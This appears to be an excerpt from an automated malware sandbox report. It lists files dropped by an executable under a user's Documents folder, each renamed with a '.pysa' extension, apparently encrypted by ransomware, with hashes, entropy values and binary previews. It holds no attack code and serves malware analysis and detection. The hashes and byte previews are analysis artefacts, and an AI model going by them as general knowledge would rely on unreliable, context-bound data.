                  Size (bytes):3072
                  Entropy (8bit):6.059608992927378
                  Encrypted:false
                  SSDEEP:48:K2V0yAdpAWJNxw1act1qmWEyMHqh7RzgXsfuEk0nDCaef9QQNHjtmmpJz+4D0qik:hV0yAXXNi37dKXckDCaefOStmmPz7L
                  MD5:7C90FC5C2FC7466298BE79EA08A4EC4C
                  SHA1:51CF90B8C6ACE56CEFE1C7FCDD8960E5A3E8085C
                  SHA-256:07C5F87F54E55DFB742955F8FFE5F29DC0623EBCC0743CE3AD2A2D61631F653B
                  SHA-512:21988E35C124C1E47EE3F67868639536760F7F099EEE5E829BEF9B153C901588985784CE83ADFC90A8B3832525A1772ED9C31C745EF64A3843BD19418C364755
                  Malicious:false
                  Preview: ..;..~..!.K...`Jo..=I..<..........<.9...h..K.R...t.._qM......P...Z".g!S.2#F1..HjN/A....p.y.`Zc.Lr4SjS.(.4h..p.....+...T..Q~r!w..3P.../......F..4u.y..]j...X.....6U.d...}......TJ...[x.c..8.f....:../....r.1.:R..K.(%*.+c..`<...yD...L.z.....~.......\........O.k.X.L..n.I...u ...9.@.i[.....W.(7....z6..p^....Q)..../9%......6F..%.@%m.aU.....:..I'..H../W.zB.y.....f)M.d.......^K#.#.R\.B....7.=...*...dH.IP...a.UGm...oL..O.... ._......1..../.......l5.dY..?J..sm...2.L ..*.G.....J..P.........r.U....BM...A.vzb.k79.:..R.7e...Y.....vl...Q..F.pvv.6..y&......e.Z..c^.-H...............q...J......'v.K.....T.i.wS.+.~#.6.[....\D./F......F@\.....:..Q...#..2.3.G.nIi).8....\-mQ.[.+......T..J?..0@.^.Sr...5*t..k.f970..%f&.\...."..B..d......z...;j....+.*t.gL...n..#Ih...'..}.C......h..'f.>F..h|.:..)"u...B..*.....w.I...5y.."^...699.7.[.../......../=...|.P."..-,.|..%.g..g6v.<S...`..,S...2.o.PM...b...'m..lO...d....(.|'.....e|_...nr.'..*...J.N......BdJRu..p.....5.t$<qy.n.
                  C:\Users\user\Documents\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0706209227842844
                  Encrypted:false
                  SSDEEP:48:EnJ9UCBScEM6DC69j1ZufgE0MtS8VQYguAQxgS2NdH99M74cGmN4815Vgge7D:EnJ9UCYcMDLZrR+SOQo5xgv796VV1Tg9
                  MD5:4680892ED493C921F0843B8849F33AD4
                  SHA1:B8913773487DA1B59FD1A1B24EA21612964F8258
                  SHA-256:0048835B43BF4B925B38C2A10C83149C254CF6E4EEDEB37C74C4B6A8902592A9
                  SHA-512:594EDF9BB0C1D3AC6BBA718472FF20BDD921C96FACD7593C2CE4FC19E2D9EB46A8B89450CBAEA52A06AA31A2A0408FA34C6525A2F7E8EED5BDE8C2A106DB6548
                  Malicious:false
                  Preview: .....c.+...t.:.....X(..4.>+.4........am.6.$jelD`q._R....9...t...c!.......R..]....a..&.R...w..{.HA.J...T.\......J..'.I..}..=..Z...WU..G.....G.'.....,.....F@....4%..T`BW....>6.. ..w^....a.....M..4...uS~.....E..._=(D..$.....-u...a.&..[.F..2.#z.*f......w..W.$......$*<%.....>V...@...h.v'.Z".P>+.8.....-..*a/HL....be.r,.......j.Z.6.{..0.n*XM'.e..`..,./&..h.Wx,..3.xs|.}.&.w.=..B..... .....*.......z....W..H..m..3K.."....[.....^..o..........m[..4W..6..[.?.Z...!.y...NQ..Z47..." .RXA.h.W...E..g6..../%...B..68Q.)..TDz..3......tl..3..G.s.....?... X.J}....+....N&...Vq.....Wq.....fTsS..".e..qB.~.......n...Q|..'E).8.i.1@...$8f.S....W.1).}.N.. ...c....[V.5..I..&..]zl.$...1...*........kp\..9.0....".^G..?........t.${.-...&..Je..U...R..:.. .E....X.o......%.(vr>.,....*.....x.dlOl.sg.. ....Rx....3]......@..E...(i..6.%..'!.!R...w......s..o.;*..........1G..........O.q.kJg.|.p+g.:]p..C='..........*..........j.K.r...Y..3iXp}E..8..g....F...6\....<.%|y....g.C.-....
                  C:\Users\user\Documents\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054184927395719
                  Encrypted:false
                  SSDEEP:48:9uuePTMO1C6g1zD5PYC6DV/29eMRv0u4CReEYNoS695GMT/LmQaW60j/r8CdcR:9uuMTdEdPYAUu4CRtYoeMXmQa04
                  MD5:9EDD05C3E7C0F93A2B11F7A49F7922F2
                  SHA1:D4535629D4F7A10FEDEC20CA6F342B52C20A501F
                  SHA-256:53EC49E3FF717949AEC2A39A2BB26B468C270AA4FB95386A607785F2595A9192
                  SHA-512:F192AADAE41D7EBA6284F12941EF57DAB2CC055990EBDB176EAC2656555EF2F7ED67D36C9ACABA418EC7F08B09B06F285FDAA37CC70AD34DADA44DAA2C6BABD9
                  Malicious:false
                  Preview: -?.&R.~..7.}....O...^...hS.G,9G......$k@RvT...".X......8(;.....jp..$.....v..l....,i.!.r.g_......N...=..A......C.....8..n.)w..0@5......Og......:.3|.?.zbD.h.....!..+.....F.JL/..V ..)*~...3"..u........tw.E.).c.....i4......t..9Dc...:.Vz.N.C..Z.t.D....w).(:.f&..N..8...B,..?5.T4..(.Z.i..................... ......'/....O....<g.8...N7FU..?Bjy..c}.. .....9c.T....o.HLCBP.b.+ =Y.vR,...0-s.'.WV..JM...E.aA`. [.G-e/.|=..^..Gy{.(....X..~..8...X.v.gK..l..m.=.c...z.........o.!X.gjH.%.0Vz..S."rUi.4. .."iqM...c..53..9X..R+....9%..)"Xf@)..f..-..&.-%ai..|=..:[..k..G.Ic.I!..Q...W....B...........>....n..X...K..K3....6......W....h.OFu9.].^......?,....G.1.C.U.t...((2.5/......k........O...?.Y ...4$B....S..J.O..."Iq@...^...6......5.Z1$.?.~...e..az.^...r...B.Z.^.4H.5^p.zX.`PlM.ck......+@sHtz.......C..OL..h.~.......q.nI+.W.F.Ay... ....c.Z...g.`u.y..W.V._'...hn.C..#..=w.Ls.....1t...q..w.a.{....~! T.$.*.9Q..+..h.$,~....&1Z"....\..s.k<.q.K.8_..e....R~...}.;H.9.`....@.
                  C:\Users\user\Documents\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.063306143403565
                  Encrypted:false
                  SSDEEP:48:6AHVYupAtyqjDh2J1IfGfgIIkrQBJiSNEArtuB8MhwYwfmjc9WRR3VLXNyPiMQbp:W6AtrD4PIKgeClBrt09jc9YlXNIiPE8n
                  MD5:09A9C7726F9792D1CB623C8DB6B67F54
                  SHA1:98D0AB3A10C9E28A667AF58C40F65B4D7B7E8289
                  SHA-256:2F73A1C30724AA98D4D8470D6464242C87E58A6780F8B3BD39D814224DA34602
                  SHA-512:F06EAD0AF15A5FBBD1F6E0872AD77379B812B9E663D19B803E147DD077987128A3E28F775690A3C3A6CDD3DB8AE04F40ED860DFE0EF0729DCCE530F226E09526
                  Malicious:false
                  Preview: .?..0........`.k.?'...~.\....V.W9+..i....VZ..#.....;;b..j<..Q...T ...Od.X..E..+..:|..,2.4...W.<.\k,.I.C.j.z..d.o.p7.p..R..0.....Qy.?8.r..N...+$Hr...l...'*.J.s.~..u+...4<... ....Q...#(e....V9jw6.DC.R%|...Bjk.L.RW.%.........zCXeO&...u{..=..s_.x......YSe..R9.h....a.V.Rd.$...^..;%..U+I!.. =-.A.C[.9....[Xm..Zb.n..?1..B%$D.2.../k...G8[.=.C...fO....o....q8 p.~vk".n...v.N..N..@7.Po....l........A?...@.|'.3...7,......p.(.~.{....{....H..<.$.}`.....2..|...2....0.%G`.1.._Ldk.ox..V:V...o.(L..d.8..N.^Ez.._..G.v.%`.Z.....B..|!..f$p."..[.A*...S.../z..W|.t..:..z........LM..>gr....5.a......?&.N....HUaj"J.<..c.u......p..r$A...[O@.Ns..>..i.y.ve.4Mq7.5..\FT.9.(;.i.I<.Wp..u.......>e.h..9...:..>.j@....M....-..p..t^.........*jC..C.hEH+e\![.C.$i..{......m?...-...MT.y...I..X..?.!H......:B.%...G.1..;z..w.7~.v............t.........S..$I/B.c..G{?/U........a.V.S......q..[.3|V..kI....K...+.]....jL.I.......P..y..h?......8.v..w..k7,xUu...!.?.n.....i.Z0.........ee. x..
                  C:\Users\user\Documents\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053169248951168
                  Encrypted:false
                  SSDEEP:48:PFh+uhGHEwwtkzKSAFJk/6m3vD8AgDBJhYUx0GOQAcLiwCW1BvmFVZYO:d4vdzKzF2/93vDXOSq0q9meB+RYO
                  MD5:8153E0EFD44E06D0918529EE75DFF637
                  SHA1:64985EEC8915993FDC343AE4AD276C6569637A4C
                  SHA-256:B101304C55B5776B7650A3830CB62BF93385D0615773446EBD863C7E19EA2258
                  SHA-512:C275838ADA480CE0B2C5D9C28367F3CBE1559227E39BAC35189D005A89325E58A9C01E5373300A9EFF1008868F268BD3028625F70B5D03AFEE3EA24CBC7FC1E8
                  Malicious:false
                  Preview: ..1D....J..D.Y...|o.dm^.2f,.}....z.......Jz}..a5.;.4.X.z<.W.6..x....>.....:..EG......2.Ou....#....'..$..G]..d9.......Z*v.{g.|.XEu`...6.}........].J....3.#...LQ.~...}Z.}.h..:...FV...;......S.6j.^.`*..3*.@^..........!B....,.{Z&.P.....l`...j....k.^.R.gY.Ik46Z.. ].,.....J.OE."..&..~@.M;g.....P..YF....G7.s..q...19.\..vi...#..Z.b]..c...._......C...X...u..b.pE.:....6..B.7....*|....:.H.J...._...0\z...Rg.^2...{../C....H<_.:.......f.px.r#.B?...$.0.I*.].Q}..?.Y........3.;....^.>.ny.W.@.u.,..t..s..>G..y....pp..A.....G..)...y.M..+.Q...i-.B.....I......^N0.(....E..{.Y...F..m. .$..6.!4.....~.....CI.\.L.B..O..j?PY.rmd..9$..........k..4m....@.k.B.1.rh.O.*A..C........X..H......|ju\$..n[.?..e...&<.*..^.e.q.......x...~......X......oO.A.wz.I..8(..Z/.q....1:?..?.yh0....}../Ql.......&..\E.4p s.I1.o.7.@Y.l.....J.]d..b....w...H...^......c......h..tP.Jp.....hL...........@...h...`9.q(G.Ov,..Q..Q..k9..N.#...;..U.a.*.#.U +..wO.m.7.Q...6.qby..ln...h<>.ag....r...
                  C:\Users\user\Documents\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0484093998785164
                  Encrypted:false
                  SSDEEP:48:luaOpsd0UlVNP/oE132FhlEkgTFbT576vnklVNFdydCN1tsbqYgFmBY0/59F2ybp:w7qSUXt3AikwNT576vkl/TSCNn9mBY0n
                  MD5:B712C0208150A838C21E64412A0BB7E4
                  SHA1:AA65EAC9AD1DF6371822E248D10FBA9D1BBC9C66
                  SHA-256:7B734BA0FDB18F42BCC51A0834D6F8D2A465A2C35A4F23939C358D68E904D3E9
                  SHA-512:0371958D89AF83F046AE1C8ACE6AAEB97C4C3E2A1B78EECDCC970B7C3CD3FEC3D1B34F6C802C608715F3E5721F12FAB7625AA8BD587EB5F6D1907111F2F382ED
                  Malicious:false
                  Preview: /..[....E..1|.)Rw1iD.......QAamK.9...V...n6.....,,I..QqI...U..5... ..y.\.K...U....*..9...E;9tvge....,...V.DDCV..}....#....[(...!.NH.(r..I."....=....e.m....Z.......W.D.z...*V.=.~.so8.|.,....P.kR..]9.....y......N..u.o.v..........Pn/\Q.f8.].......J.~kek.Z&.D...#$...nT..Q...)}...=..vO.Z5.BQ'...&..]..ed....[!.....=.........%0..2....,;.=}.o....)....z.7...Bz_...iC'j...&)..4.....,n.ZZ..e..f..;g..$F..".R.Q'.P.!...`..W.v.Jz...$.V....y`j..7<..(..L..]...}b6.V..XJ.<.E..x.UR.}..K..._...Z.QR?....z`....RP"#.e.............%@..P....]....(/...Ky....D.....L(.].3JNzJ.g.......vZ......,g>.\P.iY.,.../..k.(.6_2......)....6........jJ.o....lJ....|3tu...7.8.S........Mi...V.z.....i.O....r.1...(..'.Vi.I}~..A...$1...C../....t..."...4.).2...EP..s.v...E.......N..m...!.f ...-y.K.r6.a_{`X....5.W..&....G`.4..Ng.s...p9.\.1L.....G..2...}0..........\Sl.<gR..Y_.........p.C.Zk..E...kz<....qd..Z.....u&...-...xl./..K......u.....m.bh,.T....#/.[.p*C.0.......6.WG..9....e....$.
                  C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05384307450795
                  Encrypted:false
                  SSDEEP:48:TIQIy5iM3NTslmmMvVozKSsroGCPfeDfH7HInE1RmkWfehRZb8JzE+H5TIZg6p:vIoQdYvSvGk0boymRfehRZb8O+ZkT
                  MD5:64B97520A7F4C79FB671BB09702E23EA
                  SHA1:3E466766BE3A8CB2AA0A64C6EC6399AFD34CF38C
                  SHA-256:0EBF8F01BA0E2A7A5B8B1B74BC9C3689ADA7B93FBB46C46DDEB458496839DD88
                  SHA-512:3FE4DF62AE412927CCC4503828658C0028B2E56A041A8EE902FD8A8287536525D53C85E659905E4E6E5C3C022100173D8C0886E67023D1C28DF91B08B0E59F51
                  Malicious:false
                  Preview: .v..m.L8.V.6JCR..5.q.|&.....:j+ .:<H..".g..5...../"k..z9M.OG?.G.-[../.D8.,_..W.....e.....TiJ.Q...C)^E.<......."_..-]..r......:.........[...F0..7`G....<!Wl.w.......ets.C....v.....r....].7Uo.uKWk=.....4...cF....6y.$/...Nw%u.#S.}.......zO>a.U"Q.3..isXu]..7..-.=.....1.q.Y..7..5.>...3...9m....1..0....,}.......x.".r..F_X...5{.-...^]U..~.)y..}i..<......ae.n")l.=Un...Zsc..(#..2..K.d.&.c19.$`..r...8.I....0..|...!,3@..l.....Yn..I.5...=..%...v....z....\J.....d..L_M"7W_...J..,.Z`}.<...#s..$.d....R...B...N.E..!$.]..c.a....;....-..T....P..@n.t....x2.]a..6q...b+..].N...w.j.....sC.o..3.H'F.i..YVd.e.n_.gH....l....."9.*.f.W.e=C.^P..~@A..<.......7......R6...Y....B.........`...'.TS.z........`V...k...o-...... .O..A...INv...$.jb.....p..Q...6..a...@..M...Q*9..5.@{M.....E.8.Z...Z...1......GrC.....-.....um..G..GM.k.i.M..J....A...UH*..<b..6.K.Ko....:'....)CD..<..1I.*.L..q...<..s0..}f-LT^..U......&fg...}.~...%..xS..f..L.f......p....6s. $.}Sm..'..d.0..Z.
                  C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.051111788416815
                  Encrypted:false
                  SSDEEP:48:Rghjy2IuW5YSgfkWkWQyw/a/Qb+6j4RMZzQW6EgeZ8uvi+iMdCCgdiE+ZeuSglrq:6y21qY1fLkRyXr6ERMd6/Yji+iggdiE3
                  MD5:F1755BA75F896BE85A4D3458802F71D8
                  SHA1:88950B3805AA888482779D99EA1DE28C1F53DA0B
                  SHA-256:80330CF64315FC17E3C79535EB3C8684E95545A5C95512D43F27414B8D4B5C1B
                  SHA-512:7FB232BBAEF606454BA9004B64168928028FB262942D55CE4E71D26D8055B55E97AB0007EA311305407A41AC6C16FF91693BA06FAF6FA9C574B2047F8467900C
                  Malicious:false
                  Preview: ....}(4.h...*XQ..`=.6.&.n...l.b15.0.P&/ZjiA.*...$.9J.ZRq.3.g....hx5..5x..l4..9..p.....=.{I|...4...@,'.-Zb.9..#..d.iW..d(...iY.|.3.w.....+...-. 5...g.FF...f..`\..f.H..jUO.2....!..k..2^...sQ..L.\.:..".Q.}. +U..6_"..eh..r.4.<.N1qc..U.7..hu......T..#U.s....JF.N.....+#....x. .|.....(...YPm.A.p@3K....3NM..._...MO...P..EQc....2W..}..C....o...G.V...1d..r<...bW...]..1.q......dG.S23..WQo%._..;.q..........#... ...6...........=.Z.7...Tub.......$....R.e.w..3'..Y..u......baD....c.e.....+.U.ge.1.....Q......+M=N........%.@,.b...w.w<W"..lt%..o..hI...|].T...S..5]o.1A..i.}Nu(..2...........`...P...8hf............z.M..G.....->%s..c.9..........Pyb(uG%uE=...C...WU\._H..y.........^f%..dR.'...."..#.'...."........./f...#.<.`...V....@F.5V....b...5...E%...........XsDF.....u..T..JN.B....a?{...if...9.~..t-.B.f..\..d@.^...!.K...;..q?..&.[>....|..p.\.A.U..}#...A...E..a.............i..I.!...gj..d.D...Fo..3..M.>.:g..?..g.B~;....(x......Y....7e7....w.$.;.f....&..9
                  C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.052968603843501
                  Encrypted:false
                  SSDEEP:48:9C+G7LoxN3mV8TPrhkok7X8Ofmrv4f2/6q2RatOFhgH2uw956514Xd:9xXm+Preok7X8OF2/ARCOFhgHkXA4Xd
                  MD5:BAD6C399CA45875DC09454507B0549EA
                  SHA1:B19CC0DC38A648A6496E619AC4D43A97B05DA920
                  SHA-256:178F410183CB0D95C4B5BAD1446C508028AFB30BFCD9F28B183F95D3208FEE81
                  SHA-512:5E5049BF2E5A0E8C8B446BA0F317618188FCA7A36453719C8F65A41F351D16E83E033E3B33B6CCE88CB8FF1D19ADD1CB1F92EE6F3B528EDB87CEF798F5E820B0
                  Malicious:false
                  Preview: .;..@9.&.d.7*._.l...1......O....N...z.W*.OY..$Q..8.O..1.....$..9.....j...B....v.J..D.h.~.39..I.x..e.-.cG$.h.<..r...l3\..F..^.......5...........d~VX...f.a...:..(c.R.n.s..T.s7`]..l..Q6)z.....d..J..t+..`.Z.V.fi./.r@....h.tB...=E...:....+:..E..TXg...,.....p..r6?N....o.......V.....i.M.p.&+YDR.!^.OT.3dA[R*/...]\.uZu..I7h}.....u..[.1.K..>c.W2.B.DF.`.:0a..`....P...*^......D*w..A.8%c}..|............Q....(......'....e*........).^b!)...9..y2.7+.2Vw.qGRD..C...">.o}f...C...L.../.G..X.R.f...pT.`Y...ahH.#..R....\...deD.+]."...>...].,..;.5......`..P$.b.|".B./...Ze..*2.h..)...$.'....l....0.....{.c..w..~.G"J8n~H}..S.,...w.....:.....K'......-..3...&S......Y...\.../^0..R[.i..@...|.!t..s..U...J.4.}0...Hy.....z.1\tv.pY..l1.b...K.....z.;W5.lC.]l...............A..Mv.E.}.....FM?".Z.+.j.CuiII..?.wz.U.%....YS........h...!.F*.k.....c).c........^UB...-.b..7z#.&).?.}.',."+Z4.]...<oK.=(y.w3#.g.B..........K...(L..i.HN9#....)p....D....--..,$..S...x<..u..oE....}.e)3..]...
                  C:\Users\user\Documents\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054518428014318
                  Encrypted:false
                  SSDEEP:48:dbjGxo7M/cbc7UVsXt/LFOqv8azovXX7qHRUhM1oildBT7fHP4hdQ/IhquNRRPYp:cPcbZVsXR5OqvavbIoM2ilzT7PPOIuHC
                  MD5:E6127924EFCB6B3A58CA9053AFEBFD0E
                  SHA1:B64BF9EB7EAA690371ABB1E477F5C61FCBD132BE
                  SHA-256:F8DF802CBC92D13D573CAE4BC3A2A7EA94B3CF8295B3935F79969EA516857B20
                  SHA-512:E86FD2133A89BE5E46B9FD168D0FAB37593B7FD9F573BDBA207E4EF3CD65A1C9A6A89A00F56AFC2E6B0616127102B12C3ECEF2AB21132D4E8B8124E0845A2F8F
                  Malicious:false
                  Preview: HmO.M..d..;.%..,.5.....?k..i..~.6.4..."}...* ......|f.U./...B....6...@......B.\7.S(M\...(.1..h..<40^.#P-A..y8.k.V.....q$..P..f.......*.__.}...........e.i.'.b..G......c.-...">.>...AU.|...8..,.*&K....1.M...Z...EA{_.N....x.m..t~.{.dCr.....'8.9.(.T....)..../<R.V.3K.".k....k09..u)...~i..i......f(..%.j9.d..2...Mf6gHjG.0W)w.Q.H.@.....w.[<./..cb~@.M.Z`j\...w.P_..P.v.iV..M./...1TW./....!`..q........8']9..r......o...R.F.>......X..`.Z.>OH.4.@...N........nd...dx..u..&..~.4..7...:.*....8....'.....1.2(.)n...2d.+M..?.m.5z]w..:....H`e.L.:.....034P.;..&.Zo6..@6.e.1..K|.U...`Vd@.Y..B..i..*/]....B...)......([..\.u..dNo...?u.w.X.e....?.......VF...Y?.Y...8#.}.ixx..vuFU..hu.B...ML.&.......n.v.p.$.........L0...4m..eI.......^#.~@.:.ry.k....=..o,...gU9......K...|b.e.=!..(_k.4.2....ZT.d..y..1....u...]..[...`5vx.Jf..n..P..q_\L.,.BW....=.H..#.pL.b.r.}..v...GFFB bG.9/......W..G.2c.r...N...}........[........8.......+.....{.:.>..{.`.;..I.k.l.....^..t,.Gf....f~f
                  C:\Users\user\Documents\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.045196577888319
                  Encrypted:false
                  SSDEEP:48:E30N9uWqzr+6wkxlrCBevOFzwRvl9C/RL53/3vtIB09ZyByxJnEIT8eZIm3YH:SoFFWpZvQdyGUu5f8ek
                  MD5:8192502A8862032497AE703C23411059
                  SHA1:812172D70B80AFE840A91ED24294E1E3DF2D1B8A
                  SHA-256:E16C537C8AAB9CE17311CD739252ED99729C189EC4683B741EB09638CF32B2FC
                  SHA-512:1C40A421903305948ACD78BD10396D5B491E7B3D61D97A598EE2122CC5738CF9C8EAA06BE64CEAFF993AD6086F2AD1765CA74FD9ECD2D8A6B0F5EC55D5DBFCE0
                  Malicious:false
                  Preview: (.....vK...|:G.x@z..e....y:F.8e......_'.:...]1.....".+..Y.o....M2....}]7....d..w..".hK...m....... .-;.Y.J.)G..}..a.$.(U....m87..h.B..4K......y..Z..}.^...C.=A.gR3..~-..*..H.}r.\..b...+s3....5MZ..3..Kq.K..}.x...TG.......F..1.q...BL...."...<4..Tw..`..XXe..6...k.[...i....,.l.YG...J....x....=...#..C......9.g.?. ._.#A....(Rm*....X...!GN..ZT"|.. .......jR.9/..._.3.=A..5..'..GZ92|be.Pt.K..B.....B.1%ia.....y.o......(@.&.........`.A..v....h)y...........]....:.ws..E)v.xc.K.1..e*.. .4..xK.*..7X.n.t..V..L.CUk.,.hH.B.I.......X..mj0..;I..aD..R...w.].0..=....[9.T...o..[.x.~..1^0...%.....J..#..+.~<M.oX^..5'!E..f.......Ca%....A..p..h.j...H....i&._..FX..4v.....c...W..RpU.A).q[...2b{..C..z..e.. ..s....G.@s......h.8....?.. i..D...1.d....,...,Wi.q..l...u....h../A.............\.5z....R..`1....N.R0\...'..#...^U.%..........+G..].hd.A.}.s.g.....X../)w.].S^mS6.vV$.#.V.P..T%N7q...F6..e..... N...zc...n.@.]a.<..gu..m&.G..y@*.W.).MEu...x|..g.|....<:.V.....
                  C:\Users\user\Documents\QNCYCDFIJJ\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.058684031911772
                  Encrypted:false
                  SSDEEP:48:SozTOthveoeHYAKSsMpCcQXpltoZdlr+Iix0ZGCXS+mHtoASbUcaleKSHcMdsyia:Ivv0HBhHpCHHteDSIixiGCXS3NoAcUcN
                  MD5:1AD2B0414D83A29F3D9B31763709399C
                  SHA1:A00901C7D20DB18BCCB58CDC5E03FE769AEFC336
                  SHA-256:30783BC406783D7118742204167B5A89749E727F92A7A7E6FDB98DC12F94CA74
                  SHA-512:6B2CED0F8CA1C7A4F060C54945502BCDC96A284499A4FA8343C8FAD3198FBEBCE21EC29B0ADBE8A38D39BF09C50A0743BA5CFE48A7E51D4423F5D3ED197CBBC3
                  Malicious:false
                  Preview: ......|..dF.Lm.D.V.. .......>~...$x@...C.8.6.lX:....T.L.&.T.@...>.Y.)..+.M...B9..1.}........c...n.cr..HF..{.^3.H.)'.}s.|.....+M.@.n.qq.|h.....w.V....]o<ls...7...h...Yv..q..;Rg..>.3.m...}..... R.q..W...i..i.R.b..h.....|.D_.........{...q?u.rn..}b.k...J..y....*1....J./C...(..}..R.d.4.g/..5!..//_...l;..}'b.Tn...:9.\m..A..?.tE[.a..h..K....v...."...?xm7?B....AK.p."..j.M..mE...2.wC...yFZ....~.++..P....l..G.f%.:HQ.!5M.7.......h.6..U..x.Q7q.i.:.j.........W.d...!#t7....6u.....D...0h.p./....vfg..|.F.........S...=}aw..O.5I..........d..;p...#3.T.....tBe.4...x...z.s....._7R1..].!*.~.Sk..C..`.x..|.4.......O...e.......[...u.....DW..n.....qE...h.2.IJ....4.H....z4..%fJ0q.......,..7.Y.Y.....,.....9.(.0R.@.^%.........M....r...4...S).....eu.-..t...k.....+.R.f./R...}..r....f..1...4..q..C...z..(d.1.wH..;.f./..i................Q.:.L."I5\U..i..........u..$...bIy@...)..JG'1..j`.F..=L5...t|....X+C.ZS.....<...Btx..Y.h.....G..`....v......=.b.$..'r
                  C:\Users\user\Documents\QNCYCDFIJJ\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.072399469628606
                  Encrypted:false
                  SSDEEP:48:nC9NkIY+ZkgP6Q4yzSFt7aNl1nUt8ZXXUiRU8RMYvrz4bHOqCe+zMYDzC37zmBc6:C9Njk1Ft7gf9UAli8z4bHLtMHHCuuqIk
                  MD5:8D5A92E4C9AF82157AB525E158F1181C
                  SHA1:64B8DB2A053CE4B7DA23E44555EA61D321DE5278
                  SHA-256:2BD810258ACB735EA959B48821B81BA73794E6334869E66842685B9ECE12E0C3
                  SHA-512:A5AAC5500E9618A2BAB8DA74D825CE1075F10A756D881B735CEF8803743077428E017B0DB24CB93C1CFF9649032B01411D8E0F31FD6E06786CDFB95638D2EC60
                  Malicious:false
                  Preview: i.....2.....$...x.+......9_7...%..K.:....z......f....%.....^u....h...x.U4.......w....Ed......L..4|]....B......c?nnh.uF.B.....g.3;Q^#x......J....Ap.B+8..}.G.d.R..u..4.C)...C#.TQ.....G.7...J.L...6I>....'...v.h.P..%.%#...j.)E..a..Pr... oK.cRk....V......=......._pm..x...n.a......x......H-..uI7...&H"]..8.U#.....T.......j=.W..ct.9.4.......F...&.K......E........".W<.X.. O.....E...ka(..J....4.....lx.YU.\i..R..i.(b.h.p............x....n.J..}K.tY.....+....W]U|j...|o.cm.(.J$l._.1.Y......;...S*.S0..W.g....\...n .....b.6S..s4..A........5.1)u>V......?(.q:..........sMg.GV,.....+......7.E..iy..u....9t.......7.".d....R.....!....3..9{...S6xK.}\#..o.X....(.`......NV..$.du2L..."r-.8...qp~kp..;.....}....:qW$\.....:k.z.=.[Y.&.F.3..*......c.t.#W.$..<[.iE..t@.f.y..Nm..p..M..X.GW....:+.Yj.,.0..#.....v....5I...B....".....1..........m...G..W{.,...F&.x..G(..&.r....X..y..(....O(j)..`.....L......i.G.h.:H.v.p.S...._.e.T.l..%..R].1*.V......,.Gj .D..=........".L'\c,1.
                  C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.020531606221842
                  Encrypted:false
                  SSDEEP:48:G7aed7aI8cX15npnBPeqAlLR/SFtsyrJEl5Cf8wHLUH4OUoyuF0LB7YXYuq/jwRQ:Ua47Bg3NKFtt+5uHrUHEoykAURMT
                  MD5:23F1EA4B146A90F0A20874B5A6D1899E
                  SHA1:C4DB757F7CF28FB7DFAFC4F6E8E0FF4D86903266
                  SHA-256:4DDBCA643FFEA05EC467295EC7133950C6CE1975101A40735B46E864284FBB1A
                  SHA-512:01CC92A019C084916E8357782577B3FED0584487D1B80013839859CB4C7887725F00844A9548C70F31A82104AA24FDA3B296FF99EB8533BF08E5B94499731605
                  Malicious:false
                  Preview: b.g...bST..._.L...C...v->5..$IF...SN.Pa.........j.......7.....3...KXD.,..=..T-..0M.......T.....)F..J..V6#n..m....v&.fA..7=.R...... 4c..1..zGZ|%Og.|.;......7].`.*s7..Z..q.......,&.u...p.z.v.#...ZmI*$.O_....g.E.4.w.......v.....j.F4...`.'s.:.m.R...}..C..K$....v..>.#g..2.7.s..f...o.y.0....4_.!....c-......IX..ADGy:(.8....%uEK...?_....r...<^.....=q...B..f;\pB_..}.9..i.g..l.T..[.E.6..1.......6.$W.......C.b.h~..c..........x./.xD...!...Uq.n..E..k=..k]9.G2.er..jr..KF..$QI..2.;..N....._......(.;..-.I.KL.$/3....\...NdS.I.3.....,.......,l...Gu.=.n2..VBp... 